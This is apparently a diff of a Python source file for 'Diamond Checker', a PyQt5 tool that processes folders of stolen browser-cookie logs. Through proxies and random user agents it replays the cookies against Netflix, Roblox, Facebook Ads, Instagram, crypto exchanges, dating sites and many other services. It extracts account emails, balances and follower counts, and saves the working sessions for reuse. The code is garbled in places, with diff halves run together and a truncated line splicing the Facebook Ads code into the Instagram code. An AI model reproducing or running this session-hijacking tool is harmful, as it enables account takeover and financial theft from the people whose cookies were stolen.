- print('Working, message from server: {}'.format(jj)) - except Exception as err: - print(err) - pass - - - - - def run(self): - settings = Config().settings_reader() - global all_cooks - - all_cooks = self.files_reader(settings['settings']['dir_logs']) - - if settings['settings']['PROXY'] != "off": - self.get_proxies_from_file(settings) - else: - self.console_add_text.emit(f'Proxies are disabled\n') - global useragents - useragents = self.select_useragent_mode(settings) - - THR = settings['settings']['THR'] - threads = len(all_cooks) // THR - start = 0 - end = threads - - for i in range(0, THR): - threading.Thread(target=self.check_all, args=(all_cooks, start, end, settings)).start() - if i != THR - 1: - start += threads - end += threads - threading.Thread(target=self.check_all, args=(all_cooks, end, len(all_cooks), settings)).start() - - -class MainWindowChecker(QtWidgets.QMainWindow): - def __init__(self): - super(MainWindowChecker, self).__init__() - self.checking = CheckThread() - self.ui = main_ui.Ui_MainWindow() - self.ui.setupUi(self) - self.init_UI() - self.checking.console_add_text.connect(self.console) - self.checking.info_progress.connect(self.info_r) - self.checking.progres_setup.connect(self.progres_set) - - def init_UI(self): - - settings = Config().settings_reader() - - self.setWindowTitle('💎 Diamond Checker - Opensourced.Pro') - self.setWindowIcon(QIcon('diamond.ico')) - - self.ui.spinBox_thr.setValue(settings['settings']['THR']) - - self.ui.checkBox_ua.setCheckState(settings['settings']['USERAGENT']) - self.ui.checkBox_steam.setCheckState(settings['services']['STEAM']) - self.ui.checkBox_instagram.setCheckState(settings['services']['INSTAGRAM']) - self.ui.checkBox_funpay.setCheckState(settings['services']['FUNPAY']) - self.ui.checkBox_netflix.setCheckState(settings['services']['NETFLIX']) - self.ui.checkBox_roblox.setCheckState(settings['services']['ROBLOX']) - self.ui.checkBox_freebitcoin.setCheckState(settings['services']['FREEBITCOIN']) - self.ui.checkBox_battlenet.setCheckState(settings['services']['BATTLE']) - self.ui.checkBox_amazon.setCheckState(settings['services']['AMAZON']) - self.ui.checkBox_humble.setCheckState(settings['services']['HUMBLE']) - self.ui.checkBox_kryptex.setCheckState(settings['services']['KRYPTEX']) - self.ui.checkBox_coinbase.setCheckState(settings['services']['COINBASE']) - self.ui.checkBox_pathofexile.setCheckState(settings['services']['PATHOFEXILE']) - self.ui.checkBox_hitbtc.setCheckState(settings['services']['HITBTC']) - self.ui.checkBox_tiktok.setCheckState(settings['services']['TIKTOK']) - self.ui.checkBox_youtube.setCheckState(settings['services']['YT']) - self.ui.checkBox_discord.setCheckState(settings['services']['DISCORD']) - self.ui.checkBox_vk.setCheckState(settings['services']['VK']) - self.ui.facebookads__checkbox.setCheckState(settings['services']['FACEBOOK']) - self.ui.snapchat_ads_checkbox.setCheckState(settings['services']['SNAPCHATADS']) - self.ui.tinder_ads_checkbox.setCheckState(settings['services']['TINDERADS']) - self.ui.twitter_ads_checkbox.setCheckState(settings['services']['TWITTERADS']) - self.ui.craigslist_ads_checkbox.setCheckState(settings['services']['CRAIGSLISTADS']) - self.ui.airbnb_checkbox.setCheckState(settings['services']['AIRBNB']) - self.ui.microsoft_ads_checkbox.setCheckState(settings['services']['MICROSOFTADS']) - self.ui.walmart_checkbox.setCheckState(settings['services']['WALMART']) - self.ui.uber_eats_checkbox.setCheckState(settings['services']['UBEREATS']) - self.ui.zillow_checkbox.setCheckState(settings['services']['ZILLOW']) - self.ui.flipkart_checkbox.setCheckState(settings['services']['FLIPKART']) - self.ui.dh_gate_checkbox.setCheckState(settings['services']['DHGATE']) - self.ui.instacart_checkbox.setCheckState(settings['services']['INSTACART']) - self.ui.ashley_madison_checkbox.setCheckState(settings['services']['ASHLEYMADISON']) - self.ui.zoosk_checkbox.setCheckState(settings['services']['ZOOSK']) - self.ui.christan_mingle_checkbox.setCheckState(settings['services']['CHRISTANMINGLE']) - self.ui.vinted_checkbox.setCheckState(settings['services']['VINTED']) - self.ui.booking_checkbox.setCheckState(settings['services']['BOOKING']) - self.ui.temu_checkbox.setCheckState(settings['services']['TEMU']) - self.ui.kick_checkbox.setCheckState(settings['services']['KICK']) - self.ui.myspace_checkbox.setCheckState(settings['services']['MYSPACE']) - self.ui.snapchat_ads_checkbox.setCheckState(settings['services']['SNAPCHAT']) - self.ui.twitch_checkbox.setCheckState(settings['services']['TWITCH']) - self.ui.localsapp_checkbox.setCheckState(settings['services']['LOCALS']) - self.ui.linkedin_checkbox.setCheckState(settings['services']['LINKEDIN']) - self.ui.progressBar.setValue(0) - - self.ui.comboBox_proxy.activated.connect(self.proxy_select) - - self.ui.lineEdit_dir.setText(settings['settings']['dir_logs']) - self.ui.lineEdit_proxy.setText(settings['settings']['proxies_file']) - self.ui.lineEdit_ua.setText(settings['settings']['useragents_file']) - - self.ui.pushButton.clicked.connect(self.check) - - - - def proxy_select(self, index): - settings = Config().settings_reader() - settings['settings']['PROXY'] = self.ui.comboBox_proxy.itemText(index) - Config().settings_write(settings) - - - - def dir_logs(self): - options = QFileDialog.Options() - folderName = QFileDialog.getExistingDirectory(self, "Directory Dialog", "", options=options) - if folderName: - settings = Config().settings_reader() - settings['settings']['dir_logs'] = folderName - Config().settings_write(settings) - self.ui.lineEdit_dir.setText(settings['settings']['dir_logs']) - - def proxies_file(self): - options = QFileDialog.Options() - fileName = QFileDialog.getOpenFileName(self, "QFileDialog.getOpenFileName()", "", "*.txt", options=options) - if fileName: - settings = Config().settings_reader() - settings['settings']['proxies_file'] = fileName[0] - Config().settings_write(settings) - self.ui.lineEdit_proxy.setText(settings['settings']['proxies_file']) - - def useragents_file(self): - options = QFileDialog.Options() - fileName = QFileDialog.getOpenFileName(self, "QFileDialog.getOpenFileName()", "", "*.txt", options=options) - if fileName: - settings = Config().settings_reader() - settings['settings']['useragents_file'] = fileName[0] - Config().settings_write(settings) - self.ui.lineEdit_ua.setText(settings['settings']['useragents_file']) - - def check(self): - settings = Config().settings_reader() - settings['settings']['THR'] = int(self.ui.spinBox_thr.text()) - settings['settings']['USERAGENT'] = int(self.ui.checkBox_ua.checkState()) - settings['services']['STEAM'] = int(self.ui.checkBox_steam.checkState()) - settings['services']['INSTAGRAM'] = int(self.ui.checkBox_instagram.checkState()) - settings['services']['FUNPAY'] = int(self.ui.checkBox_funpay.checkState()) - settings['services']['NETFLIX'] = int(self.ui.checkBox_netflix.checkState()) - settings['services']['ROBLOX'] = int(self.ui.checkBox_roblox.checkState()) - settings['services']['FREEBITCOIN'] = int(self.ui.checkBox_freebitcoin.checkState()) - settings['services']['BATTLE'] = int(self.ui.checkBox_battlenet.checkState()) - settings['services']['AMAZON'] = int(self.ui.checkBox_amazon.checkState()) - settings['services']['HUMBLE'] = int(self.ui.checkBox_humble.checkState()) - settings['services']['KRYPTEX'] = int(self.ui.checkBox_kryptex.checkState()) - settings['services']['COINBASE'] = int(self.ui.checkBox_coinbase.checkState()) - settings['services']['PATHOFEXILE'] = int(self.ui.checkBox_pathofexile.checkState()) - settings['services']['HITBTC'] = int(self.ui.checkBox_hitbtc.checkState()) - settings['services']['TIKTOK'] = int(self.ui.checkBox_tiktok.checkState()) - settings['services']['YT'] = int(self.ui.checkBox_youtube.checkState()) - settings['services']['DISCORD'] = int(self.ui.checkBox_discord.checkState()) - settings['services']['VK'] = int(self.ui.checkBox_vk.checkState()) - settings['services']['FACEBOOK'] = int(self.ui.checkBox_facebook_ads.checkState()) - settings['services']['DISCORD'] = int(self.ui.checkBox_discord.checkState()) - settings['services']['SNAPCHATADS'] = int(self.ui.snapchat_ads_checkbox.checkState()) - settings['services']['MICROSOFTADS'] = int(self.ui.microsoft_ads_checkbox.checkState()) - settings['services']['TINDERADS'] = int(self.ui.tinder_ads_checkbox.checkState()) - settings['services']['TWITTERADS'] = int(self.ui.twitter_ads_checkbox.checkState()) - settings['services']['CRAIGSLISTADS'] = int(self.ui.craigslist_ads_checkbox.checkState()) - settings['services']['AIRBNB'] = int(self.ui.airbnb_checkbox.checkState()) - settings['services']['WALMART'] = int(self.ui.walmart_checkbox.checkState()) - settings['services']['UBEREATS'] = int(self.ui.uber_eats_checkbox.checkState()) - settings['services']['ZILLOW'] = int(self.ui.zillow_checkbox.checkState()) - settings['services']['FLIPKART'] = int(self.ui.flipkart_checkbox.checkState()) - settings['services']['DHGATE'] = int(self.ui.dh_gate_checkbox.checkState()) - settings['services']['INSTACART'] = int(self.ui.instacart_checkbox.checkState()) - settings['services']['ASHLEYMADISON'] = int(self.ui.ashley_madison_checkbox.checkState()) - settings['services']['ZOOSK'] = int(self.ui.zoosk_checkbox.checkState()) - settings['services']['CHRISTANMINGLE'] = int(self.ui.christan_mingle_checkbox.checkState()) - settings['services']['VINTED'] = int(self.ui.vinted_checkbox.checkState()) - settings['services']['BOOKING'] = int(self.ui.booking_checkbox.checkState()) - settings['services']['TEMU'] = int(self.ui.temu_checkbox.checkState()) - settings['services']['KICK'] = int(self.ui.kick_checkbox.checkState()) - settings['services']['MYSPACE'] = int(self.ui.myspace_checkbox.checkState()) - settings['services']['SNAPCHAT'] = int(self.ui.snapchat_ads_checkbox.checkState()) - settings['services']['TWITCH'] = int(self.ui.twitch_checkbox.checkState()) - settings['services']['LOCALS'] = int(self.ui.localsapp_checkbox.checkState()) - settings['services']['LINKEDIN'] = int(self.ui.linkedin_checkbox.checkState()) - settings['services']['HUMBLE'] = int(self.ui.checkBox_humble.checkState()) - - - Config().settings_write(settings) - - self.checking.start() - - def console(self, text): - self.ui.textEdit_console.append(text) - - def info_r(self, checked): - if len(all_cooks) > checked: - self.ui.progressBar.setValue(checked) - - else: - window_complete = QMessageBox() - window_complete.setWindowTitle("Status") - window_complete.setText("All logs have been scanned") - window_complete.setIcon(QMessageBox.Information) - window_complete.setStandardButtons(QMessageBox.Ok) - window_complete.exec_() - self.ui.progressBar.setValue(0) - - def progres_set(self, all_cooks): - self.ui.progressBar.setRange(0, all_cooks) - - -class ConnectServerThread(QThread): - signal_check_login = pyqtSignal(str) - - def __init__(self): - QThread.__init__(self) - - def run(self): - try: - client_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - client_sock.connect(('108.61.159.163', 5000)) # Replace with the correct IP address and port number - - data = json.dumps({"WHID": self.user_whid, "username": self.username}) - - client_sock.send(data.encode()) - data = client_sock.recv(4096) - data = data.decode() - self.signal_check_login.emit(data) - data = json.loads(data) - client_sock.close() - - except ConnectionResetError: - # Handle the connection reset error - error_message = "The connection was forcibly closed by the remote host." - self.signal_check_login.emit(json.dumps({"Donat": "0", "Messages": error_message})) - - except Exception as e: - # Handle other exceptions - error_message = f"An error occurred during the connection: {e}" - self.signal_check_login.emit(json.dumps({"Donat": "0", "Messages": error_message})) - - def init_args(self, user_whid, username): - self.user_whid = user_whid - self.username = username - - -class LoginChekedGUI(QtWidgets.QMainWindow): - def __init__(self): - super(LoginChekedGUI, self).__init__() - self.connect_server = ConnectServerThread() - self.ui = LoginCheked_UI.Ui_MainWindow() - self.ui.setupUi(self) - self.init_UI() - self.connect_server.signal_check_login.connect(self.openmessage) - - def init_UI(self): - self.setWindowTitle('Diamond Checker - Login') - self.setWindowIcon(QIcon('diamond.ico')) - self.ui.lineEdit.setText("Telegram login") - self.ui.pushButton.clicked.connect(self.check) - - def check(self): - settings = Config().settings_reader() - if settings["authorization"]["username"] == "": - settings["authorization"]["username"] = self.ui.lineEdit.text() - Config().settings_write(settings) - - user_whid = WMI().Win32_ComputerSystemProduct()[0].UUID - self.connect_server.init_args(user_whid, settings["authorization"]["username"]) - self.connect_server.start() - - # Check if the checkbox is checked - checkbox_state = self.ui.snapchat_checkbox.isChecked() - settings['services']['SNAPCHATADS'] = int(checkbox_state) - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - def openmessage(self, data): - data = json.loads(data) - donat = data.get("Donat") - messages = data.get("Messages") - if donat == "1": - self.application2 = MainWindowChecker() - self.application2.show() - application.hide() - else: - settings = Config().settings_reader() - settings["authorization"]["username"] = "" - Config().settings_write(settings) - window_donat = QMessageBox() - window_donat.setWindowTitle("Status") - window_donat.setText(messages) - window_donat.setIcon(QMessageBox.Information) - window_donat.setStandardButtons(QMessageBox.Ok) - window_donat.exec_() - - - - def init_UI(self): - # Create a Skip button - self.skip_button = QtWidgets.QPushButton('Skip', self) - self.skip_button.clicked.connect(self.skip_login) - # Position the Skip button as needed - self.skip_button.setGeometry(10, 10, 100, 30) - - def skip_login(self): - # Implement the functionality to skip the login process - # For example, you can open the main application window directly - self.application2 = MainWindowChecker() - self.application2.show() - self.hide() - - - - - - - - - - -if __name__ == "__main__": - print("Do not close this window while the program is running\nDo not close this window while the program is running.") - app = QtWidgets.QApplication(sys.argv) - application = LoginChekedGUI() - application.show() - - settings = Config().settings_reader() - if settings["authorization"]["username"] != "": - application.check() - - sys.exit(app.exec()) +import datetime as DT +import glob +import http.client +import json +import os +import random +import re +import shutil +import socket +import sys +import threading +from PyQt5 import QAxContainer +import requests +from PyQt5 import QtWidgets +from PyQt5.QtCore import QThread, QTimer +from PyQt5.QtCore import pyqtSignal +from PyQt5.QtGui import QIcon +from PyQt5.QtWidgets import QFileDialog +from PyQt5.QtWidgets import QMessageBox +from bs4 import BeautifulSoup as bs +from wmi import WMI +from LoginCheked_UI import Ui_MainWindow +from jsoni_control import Config +from PyQt5.QtWidgets import QApplication, QMainWindow, QFileDialog, QTextEdit, QLabel +import LoginCheked_UI +import main_ui + +checked = 0 +yt_cookies = [] +vk_cookies = [] +VK_CHECKED = 0 +YT_CHECKED = 0 +INST_CHECKED = 0 +AMAZON_CHECKED = 0 +STEAM_CHECKED = 0 +EPIC_CHECKED = 0 +TWITCH_CHECKED = 0 +http.client._MAXHEADERS = 1000000 +proxies = None + + +class CheckThread(QThread): + console_add_text = pyqtSignal(str) + info_progress = pyqtSignal(int) + progres_setup = pyqtSignal(int) + + def __init__(self): + QThread.__init__(self) + self.timer = QTimer() + + def err(e, exit=True): + input(e) + if exit: + sys.exit() + + def get_path(self, path): + new_path = '' + counter = 0 + for i in path: + if i == "\\": + counter += 1 + if counter >= 2: + break + new_path += i + return new_path + + def files_reader(self, logs): + self.console_add_text.emit('Looking for cookies...') + + all_cooks = [] + + for folder, subfolder, file in os.walk(logs): + for filename in file: + if filename.endswith('.txt'): + all_cooks += [os.path.join(folder, filename)] + self.console_add_text.emit(f"Was it possible to find : {len(all_cooks)}") + self.progres_setup.emit(len(all_cooks)) + return all_cooks + + def get_proxies_from_file(self, settings): + global proxies + try: + with open(settings['settings']['proxies_file'], 'r', encoding='utf-8') as (pf): + proxies = pf.read().splitlines() + self.console_add_text.emit(f"Proxies are enabled, downloaded {len(proxies)} a proxy, like {settings['settings']['PROXY']}\n") + except FileNotFoundError: + self.console_add_text.emit( + f"The proxy file was not found: {settings['settings']['proxies_file']} restart and select a file with a proxy or any TXT\n") + self.err(f"file {settings['settings']['proxies_file']} not found") + except Exception as e: + self.err(f"get_proxies_from_file: {e}") + + pass + + def get_random_proxy(self, settings): + random_proxy = random.choice(proxies) + try: + ip, port, username, password = random_proxy.split(':') + return {'https': f"{settings['settings']['PROXY']}://{username}:{password}@{ip}:{port}"} + except ValueError: + return {'https': f"{settings['settings']['PROXY']}://{random_proxy}"} + + def save_cookies_yt(self, folder_name, cookie_name, channel_name, subscribers): + global yt_cookies + try: + if channel_name not in yt_cookies: + if os.path.exists(folder_name): + cookie_file = open(f'{cookie_name}', 'r', encoding='utf-8') + results = open(f'{folder_name}//{folder_name}_subscribers_{subscribers}_channel_{channel_name}.txt', 'w', + encoding='utf-8') + results.write(f'{cookie_file.read()}') + results.close() + cookie_file.close() + yt_cookies.append(channel_name) + else: + os.mkdir(folder_name) + cookie_file = open(f'{cookie_name}', 'r', encoding='utf-8') + results = open(f'{folder_name}//{folder_name}_subscribers_{subscribers}_channel_{channel_name}.txt', 'w', + encoding='utf-8') + results.write(f'{cookie_file.read()}') + results.close() + cookie_file.close() + yt_cookies.append(channel_name) + except: + pass + + def save_cookies(self, folder_name, cookie_name): + try: + if os.path.exists(folder_name): + cookie_file = open(f'{cookie_name}', 'r', encoding='utf-8') + results = open(f'{folder_name}//{folder_name}{random.randint(1, 100000000)}.txt', 'w', encoding='utf-8') + results.write(f'{cookie_file.read()}') + results.close() + cookie_file.close() + else: + os.mkdir(folder_name) + cookie_file = open(f'{cookie_name}', 'r', encoding='utf-8') + results = open(f'{folder_name}//{folder_name}{random.randint(1, 100000000)}.txt', 'w', encoding='utf-8') + results.write(f'{cookie_file.read()}') + results.close() + cookie_file.close() + except UnicodeDecodeError: + try: + if os.path.exists(folder_name): + cookie_file = open(f'{cookie_name}', 'r') + results = open(f'{folder_name}//{folder_name}{random.randint(1, 100000000)}.txt', 'w', + encoding='utf-8') + results.write(f'{cookie_file.read()}') + results.close() + cookie_file.close() + else: + os.mkdir(folder_name) + cookie_file = open(f'{cookie_name}', 'r') + results = open(f'{folder_name}//{folder_name}{random.randint(1, 100000000)}.txt', 'w', + encoding='utf-8') + results.write(f'{cookie_file.read()}') + results.close() + cookie_file.close() + except: + pass + pass + + def open_cookie_json(self, cookie_name, service): + with open(cookie_name, "r") as read_file: + data = json.load(read_file) + cookie = {} + for i in range(0, len(data)): + try: + if service in data[i]["domain"]: + cookie[data[i]["name"]] = f'{data[i]["value"]}' + except: + continue + return cookie + + def select_useragent_mode(self, settings): + if settings['settings']['USERAGENT'] == 2: + global useragents + try: + with open(settings['settings']['useragents_file'], 'r', encoding='utf-8') as (pf): + useragents = pf.read().splitlines() + self.console_add_text.emit(f'Uploaded {len(useragents)} user agents\n') + return useragents + except Exception as err: + self.console_add_text.emit("Error loading the user agent, you may have entered an incorrect file name" + self.err) + else: + pass + + def net_to_cookie(self, filename, service): + cookies = {} + try: + with open(filename, 'r', encoding='utf-8') as fp: + for line in fp: + try: + if not re.match(r'^\#', line) and service in line: + lineFields = line.strip().split('\t') + cookies[lineFields[5]] = lineFields[6] + except Exception as err: + continue + except UnicodeDecodeError: + with open(filename, 'r') as fp: + for line in fp: + try: + if not re.match(r'^\#', line) and service in line: + lineFields = line.strip().split('\t') + cookies[lineFields[5]] = lineFields[6] + except Exception as err: + continue + return cookies + + def save_results(self, folder_name, file_name, text_to_insert): + if os.path.exists(folder_name): + results = open(f'{folder_name}\\{file_name}', 'a', encoding='utf-8') + results.write(f'{text_to_insert}\n') + results.close() + else: + os.mkdir(folder_name) + results = open(f'{folder_name}\\{file_name}', 'a', encoding='utf-8') + results.write(f'{text_to_insert}\n') + results.close() + + def save_logs(self, folder_name, cookie_name, text_to_insert): + try: + if os.path.exists(folder_name): + shutil.copytree(self.get_path(cookie_name), folder_name+"\\"+self.get_path(cookie_name).split("\\")[1]) + self.save_results(folder_name+"\\"+self.get_path(cookie_name).split("\\")[1], + folder_name+"_checked_info.txt", + f'{text_to_insert}\n\n') + else: + os.mkdir(folder_name) + shutil.copytree(self.get_path(cookie_name), folder_name + "\\" + self.get_path(cookie_name).split("\\")[1]) + self.save_results(folder_name + "\\" + self.get_path(cookie_name).split("\\")[1], + folder_name + "_checked_info.txt", + f'{text_to_insert}\n\n') + except Exception as err: + print(err) + pass + + def check_all(self, all_cooks, start, end, settings): + global checked + for i in range(start, end): + try: + if settings['services']['EPICGAMES'] == 2: + try: + self.check_epic(all_cooks[i], settings) + except: + pass + if settings['services']['FREEBITCOIN'] == 2: + try: + self.check_free_bitcoin(all_cooks[i], settings) + except: + pass + if settings['services']['FUNPAY'] == 2: + try: + self.check_funpay(all_cooks[i], settings) + except: + pass + if settings['services']['VK'] == 2: + try: + self.check_vk(all_cooks[i], settings) + except: + pass + if settings['services']['STEAM'] == 2: + try: + self.check_steam(all_cooks[i], settings) + except: + pass + if settings['services']['YT'] == 2: + try: + self.check_youtube(all_cooks[i], settings) + except: + pass + if settings['services']['BATTLE'] == 2: + try: + self.check_battlenet_games(all_cooks[i], settings) + except: + pass + if settings['services']['INSTAGRAM'] == 2: + try: + self.check_instagram(all_cooks[i], settings) + except: + pass + if settings['services']['FACEBOOK'] == 2: + try: + self.check_facebook_ads(all_cooks[i], settings) + except: + pass + if settings['services']['ROBLOX'] == 2: + try: + self.check_roblox(all_cooks[i], settings) + except: + pass + if settings['services']['NETFLIX'] == 2: + try: + self.check_netflix(all_cooks[i], settings) + except: + pass + if settings['services']['HUMBLE'] == 2: + try: + self.check_humble(all_cooks[i], settings) + except: + pass + if settings['services']['COINBASE'] == 2: + try: + self.check_coinbase(all_cooks[i], settings) + except: + pass + if settings['services']['AMAZON'] == 2: + try: + self.check_amazon(all_cooks[i], settings) + except: + pass + if settings['services']['KRYPTEX'] == 2: + try: + self.check_kryptex(all_cooks[i], settings) + except: + pass + if settings['services']['TIKTOK'] == 2: + try: + self.check_tiktok(all_cooks[i], settings) + except: + pass + if settings['services']['PATHOFEXILE'] == 2: + try: + self.check_pathofexile(all_cooks[i], settings) + except: + pass + if settings['services']['HITBTC'] == 2: + try: + self.check_hitbtc(all_cooks[i], settings) + except: + pass + if settings['services']['DISCORD'] == 2: + try: + self.check_discord(all_cooks[i], settings) + except: + pass + if settings['services']['BINGADS'] == 2: + try: + self.check_bingads(all_cooks[i], settings) + except: + pass + if settings['services']['SNAPCHATADS'] == 2: + try: + self.check_snapchatads(all_cooks[i], settings) + except: + pass + if settings['services']['SEMRUSH'] == 2: + try: + self.check_semrush(all_cooks[i], settings) + except: + pass + if settings['services']['REDDITADS'] == 2: + try: + self.check_redditads(all_cooks[i], settings) + except: + pass + if settings['services']['TINDERADS'] == 2: + try: + self.check_tinderads(all_cooks[i], settings) + except: + pass + if settings['services']['MICROSOFTADS'] == 2: + try: + self.check_microsoftads(all_cooks[i], settings) + except: + pass + if settings['services']['CRAIGSLISTADS'] == 2: + try: + self.check_craigslistads(all_cooks[i], settings) + except: + pass + if settings['services']['AIRBNB'] == 2: + try: + self.check_airbnb(all_cooks[i], settings) + except: + pass + if settings['services']['TWITTERADS'] == 2: + try: + self.check_twitterads(all_cooks[i], settings) + except: + pass + if settings['services']['WALMART'] == 2: + try: + self.check_walmart(all_cooks[i], settings) + except: + pass + if settings['services']['UBEREATS'] == 2: + try: + self.check_ubereats(all_cooks[i], settings) + except: + pass + if settings['services']['ZILLOW'] == 2: + try: + self.check_zillow(all_cooks[i], settings) + except: + pass + if settings['services']['FLIPKART'] == 2: + try: + self.check_flipkart(all_cooks[i], settings) + except: + pass + if settings['services']['DHGATE'] == 2: + try: + self.check_dhgate(all_cooks[i], settings) + except: + pass + if settings['services']['INSTACART'] == 2: + try: + self.check_instacart(all_cooks[i], settings) + except: + pass + if settings['services']['ASHLEYMADISON'] == 2: + try: + self.check_ashleymadison(all_cooks[i], settings) + except: + pass + if settings['services']['ZOOSK'] == 2: + try: + self.check_zoosk(all_cooks[i], settings) + except: + pass + if settings['services']['CHRISTANMINGLE'] == 2: + try: + self.check_christanmingle(all_cooks[i], settings) + except: + pass + if settings['services']['VINTED'] == 2: + try: + self.check_vinted(all_cooks[i], settings) + except: + pass + if settings['services']['BOOKING'] == 2: + try: + self.check_booking(all_cooks[i], settings) + except: + pass + if settings['services']['ZOOSK'] == 2: + try: + self.check_zoosk(all_cooks[i], settings) + except: + pass + if settings['services']['TEMU'] == 2: + try: + self.check_temu(all_cooks[i], settings) + except: + pass + if settings['services']['KICK'] == 2: + try: + self.check_kick(all_cooks[i], settings) + except: + pass + if settings['services']['MYSPACE'] == 2: + try: + self.check_myspace(all_cooks[i], settings) + except: + pass + if settings['services']['SNAPCHAT'] == 2: + try: + self.check_snapchat(all_cooks[i], settings) + except: + pass + if settings['services']['TWITCH'] == 2: + try: + self.check_twitch(all_cooks[i], settings) + except: + pass + if settings['services']['LOCALS'] == 2: + try: + self.check_locals(all_cooks[i], settings) + except: + pass + if settings['services']['LINKEDIN'] == 2: + try: + self.check_linkedin(all_cooks[i], settings) + except: + pass + checked += 1 + self.info_progress.emit(checked) + except Exception as err: + checked += 1 + self.info_progress.emit(checked) + + continue + + + + def conn(self, obj, url, cookies, settings, headers, params=None, json=None, data=None): + connection_counter = 0 + if settings['settings']['PROXY'] != "off": + while True: + connection_counter += 1 + if connection_counter >= 15: + return None + proxy = self.get_random_proxy(settings) + if settings["settings"]["USERAGENT"] == 2: + headers_useragent = {'accept-language': 'ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3', 'user-agent': random.choice(useragents)} + headers = dict(list(headers.items()) + list(headers_useragent.items())) + + + else: + headers_useragent = {'accept-language': 'ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3', + 'user-agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'} + headers = dict(list(headers.items()) + list(headers_useragent.items())) + + try: + r = obj(url=url, headers=headers, params=params, data=data, cookies=cookies, proxies=proxy, json=json,timeout=5) + if r.status_code == 404: + return r + if r.status_code == 200: + return r + except Exception as e: + try: + continue + finally: + e = None + del e + else: + if settings["settings"]["USERAGENT"] == 2: + headers_useragent = {'accept-language': 'ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3', 'user-agent': random.choice(useragents)} + headers = dict(list(headers.items()) + list(headers_useragent.items())) + else: + headers_useragent = {'accept-language': 'ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3', + 'user-agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'} + headers = dict(list(headers.items()) + list(headers_useragent.items())) + + r = obj(url=url, headers=headers, params=params, data=data, cookies=cookies) + return r + + def check_netflix(self, cookie_name, settings): + try: + cookie = self.net_to_cookie(cookie_name, 'netflix') + except: + cookie = {} + if len(cookie) > 1: + try: + session = requests.Session() + r = self.conn(obj=session.get, url="https://www.netflix.com/YourAccount", cookies=cookie, settings=settings, headers={}) + soup = bs(r.text, 'html.parser') + plan = soup.find('div', attrs={'data-uia': "plan-label"}).find('b').text + + email = soup.find('div', attrs={'class': 'account-section-item account-section-email'}).text + self.save_results('Netflix', 'netflix.txt', f'email - {email} || Plan - {plan}\nCookie:{cookie_name}') + if settings['settings']['save_netflix_logs'] == 1: + self.save_logs('Netflix', cookie_name, f'email - {email} || Plan - {plan}\nCookie:{cookie_name}') + self.console_add_text.emit(f'Netflix\nemail - {email} || Plan - {plan}\nCookie:{cookie_name}') + except Exception as err: + self.console_add_text.emit(self.err) + pass + + def check_roblox(self, cookie_name, settings): + try: + cookie = self.net_to_cookie(cookie_name, 'roblox') + except: + cookie = {} + if len(cookie) > 1: + try: + session = requests.Session() + r = self.conn(obj=session.get, url='https://www.roblox.com/home', cookies=cookie, settings=settings, headers={}) + soup = bs(r.text, 'html.parser') + id = soup.find('meta', attrs={'name': "user-data"}).get('data-userid') + r = self.conn(obj=session.get, url=f'https://economy.roblox.com/v1/users/{id}/currency', cookies=cookie, settings=settings, headers={}) + robux = r.json()['robux'] + self.console_add_text.emit(f'ROBUX: {robux} || Cookie:{cookie_name}') + self.save_results('Roblox', 'roblox.txt', f'ROBUX: {robux} || Cookie:{cookie_name}') + if settings['settings']['save_roblox_logs'] == 1: + self.save_logs('Roblox', cookie_name, f'ROBUX: {robux} || Cookie:{cookie_name}') + except: + pass + + def check_facebook(self, cookie_name, settings): + try: + cookie = self.net_to_cookie(cookie_name, 'facebook') + except: + cookie = {} + if len(cookie) > 1: + try: + session = requests.Session() + r = self.conn(obj=session.get, url="https://www.facebook.com/settings", cookies=cookie, settings=settings, headers={}) + soup = bs(r.text, 'html.parser') + name = soup.find('span', attrs={'class': "_1vp5"}).text + self.console_add_text.emit('Facebook valid session!') + print('Facebook valid session!') + self.save_results('Facebook', 'Facebook.txt', f'Valid session facebook:{cookie_name}') + if settings['settings']['save_facebook_logs'] == 1: + self.save_logs('Facebook', cookie_name, f'Valid session facebook:{cookie_name}') + self.check_facebook_ads(cookie_name, settings) + except Exception as err: + print(err) + pass + + def check_facebook_ads(self, cookie_name, settings): + try: + cookie = self.net_to_cookie(cookie_name, 'facebook') + except: + cookie = {} + if len(cookie) > 1: + try: + session = requests.Session() + session.max_redirects = 500 + text = '' + folder_name = '' + account_status = {1: 'ACTIVE', + 2: 'DISABLED', + 3: 'UNSETTLED', + 7: 'PENDING_RISK_REVIEW', + 8: 'PENDING_SETTLEMENT', + 9: 'IN_GRACE_PERIOD', + 100: 'PENDING_CLOSURE', + 101: 'CLOSED', + 201: 'ANY_ACTIVE', + 202: 'ANY_CLOSED'} + r = self.conn(obj=session.get, url="https://www.facebook.com/adsmanager/manage/campaigns?", cookies=cookie, settings=settings, headers={}) + comp_id = r.text.split("campaigns?act=")[1] + print("XYI FB") + comp_id = comp_id.split('")')[0] + + r = self.conn(obj=session.get, url=f'https://www.facebook.com/adsmanager/manage/campaigns?act={comp_id}', cookies=cookie, settings=settings, headers={}) + token = r.text.split('')[0] + data = json.loads(html) + profile_url = f"https://www.instagram.com/{data['config']['viewer']['username']}" + number_verif = data['config']['viewer']['has_phone_number'] + r = self.conn(obj=session.get, url=profile_url, cookies=cookie, settings=settings, headers={}) + html = r.text.split('window._sharedData = ')[1] + html = html.split(';')[0] + data = json.loads(html) + subs_count = data['entry_data']['ProfilePage'][0]['graphql']['user']['edge_followed_by']['count'] + follow = data['entry_data']['ProfilePage'][0]['graphql']['user']['edge_follow']['count'] + self.console_add_text.emit( + f'Instagram\nPROFILE URL - {profile_url} || PHONE_VERIF - {number_verif} || SUBSCRIBERS - {subs_count}\n FOLOLOW - {follow}\nCookie:{cookie_name}\n\n{"=" * 30}\n') + if not os.path.exists('Instagram'): + os.mkdir('Instagram') + if settings['cookies']['instagram'] == 1: + self.save_cookies('Instagram_cookies', cookie_name) + if int(subs_count) > int(settings['save_filters']['inst_min_subs']): + path_to_save = f"Instagram\\Instagram_{settings['save_filters']['inst_min_subs']}" + self.save_results(path_to_save, 'Instagram.txt', + f'PROFILE URL - {profile_url} || PHONE_VERIF - {number_verif} || SUBSCRIBERS - 